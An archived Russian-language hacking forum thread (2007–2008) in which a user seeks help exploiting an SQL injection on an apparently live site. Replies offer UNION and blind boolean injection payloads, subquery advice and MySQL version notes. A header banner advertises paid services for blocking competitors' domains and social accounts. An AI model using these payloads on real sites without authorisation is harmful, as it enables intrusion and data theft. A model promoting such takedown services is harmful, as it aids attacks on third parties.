УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Вопрос специалистам в sql-injection

Страница 1 из 2

Опции темы

Поиск в этой теме

Опции просмотра

Вопрос специалистам в sql-injection

30.12.2007, 23:10

JenJen

Новичок

Регистрация: 02.11.2007

Сообщений: 29

Провел на форуме:
114292

Репутация: 9

Вопрос специалистам в sql-injection

Всем привет. Такой вопрос:
есть sql-injection. При запросе при добавлении к уязвимому параметру:

monthname=december' order by 8/*

выдаётся следующая ошибка:

Код:

Error:  Запрос: SELECT SUM(uhits) AS suhits, SUM(vhits) AS svhits, SUM(installs) AS sinstalls, SUM(total) AS stotal, SUM(referals) AS sreferals, SUM(portal) AS sportal, SUM(bonus_inst) AS sbonus_inst FROM stats WHERE id_user='4455' AND YEAR(date)=YEAR(NOW()) AND MONTHNAME(date)='December' order by 8/*'  Ошибка: Unknown column '8' in 'order clause'

При вводе:
monthname=december' order by 7/* ошибки не выдается, естественно выводится нормальная страница, получается вроде как 7 полей. Однако при

monthname=december' union select 1,2,3,4,5,6,7/*

выводится ошибка вида:

Код:

Error:  Запрос: SELECT * FROM stats a WHERE id_user='4455' AND YEAR(date)=YEAR(NOW()) AND MONTHNAME(date)='December' union select 1,2,3,4,5,6,7/*' ORDER by -date  Ошибка: The used SELECT statements have a different number of columns

Эта же ошибка выводится во всех запросах по типу

monthname=december' union select в кол-ве колонок от 1 до 60, дальше я не пробовал.

Я так понял тут следуют несколько один за одним запросов, как с этим работать?

Надеюсь на Ваши ответы )

Апд:модеры, я запостил здесь потому что ситуация не еденичная и вообще не очень широко освещена в статьях. Тема о том, что и как делать если идут подряд несколько запросов.

Последний раз редактировалось JenJen; 30.12.2007 в 23:39..

30.12.2007, 23:23

AFoST

Members of Antichat - Level 5

Регистрация: 28.05.2007

Сообщений: 729

Провел на форуме:
5571194

Репутация: 1934

Отправить сообщение для AFoST с помощью ICQ

monthname=december' union select 111,222,333,444,555,666,777/*
На странице или в коде страницы есть такие значения при таком запросе?

30.12.2007, 23:37

JenJen

Новичок

Регистрация: 02.11.2007

Сообщений: 29

Провел на форуме:
114292

Репутация: 9

Цитата:

Сообщение от AFoST

monthname=december' union select 111,222,333,444,555,666,777/*
На странице или в коде страницы есть такие значения при таком запросе?

Никаких, выводится исключительно текст ошибки и всё. Если б выводилось я б не задавал вопросов.

30.12.2007, 23:47

AFoST

Members of Antichat - Level 5

Регистрация: 28.05.2007

Сообщений: 729

Провел на форуме:
5571194

Репутация: 1934

Пока больше никаких идей нет

30.12.2007, 23:50

Spyder

Members of Antichat - Level 5

Регистрация: 09.10.2006

Сообщений: 1,698

Провел на форуме:
9098076

Репутация: 4303

Чё вы ему тут насоветовали? ппц
У тебя в скрипте 2 запроса с одной переменной, правильное кол-во столбцов тебе подобрать не получится, ибо один из запросо всегда будет не верный
В твоём случае только подзапросы юзать

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

30.12.2007, 23:52

JenJen

Новичок

Регистрация: 02.11.2007

Сообщений: 29

Провел на форуме:
114292

Репутация: 9

Цитата:

Сообщение от Spyder

Да, спасибо я уже это понял.
Может расскажешь как их правильно юзать или дашь ссылку?

31.12.2007, 17:16

Nea7

Участник форума

Регистрация: 08.09.2007

Сообщений: 211

Провел на форуме:
5076186

Репутация: 778

Цитата:

Сообщение от JenJen

Да, спасибо я уже это понял.
Может расскажешь как их правильно юзать или дашь ссылку?

http://forum.antichat.ru/showpost.php?p=537435&postcount=567
брошюрко -> статья ZaCo

31.12.2007, 23:48

~~Серенький~~

Banned

Регистрация: 13.04.2007

Сообщений: 123

Провел на форуме:
921520

Репутация: 572

учти, что в мускулах <4.2 подзапросы не поддерживаются.

01.01.2008, 02:24

blackybr

♠ ♦ ♣ ♥

Регистрация: 18.05.2006

Сообщений: 1,828

Провел на форуме:
8042357

Репутация: 3742

Отправить сообщение для blackybr с помощью ICQ

Отправить сообщение для blackybr с помощью AIM

Отправить сообщение для blackybr с помощью Yahoo

не 4.2, а 4.1.. то есть подзапросы появились в 4.1..

monthname=december+and+ascii(substring(version(),1 ,1))>0/*
monthname=december+and+ascii(substring(version(),1 ,1))<0/*

проверь разные ли ответы

__________________

Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2

#10

01.01.2008, 04:03

~~Серенький~~

Banned

Регистрация: 13.04.2007

Сообщений: 123

Провел на форуме:
921520

Репутация: 572

Да, спасибо за поправку,
с Наступившим.

Страница 1 из 2

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection для чайников, взлом ASP+MSSQL	k00p3r	Чужие Статьи	0	12.06.2005 12:42
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход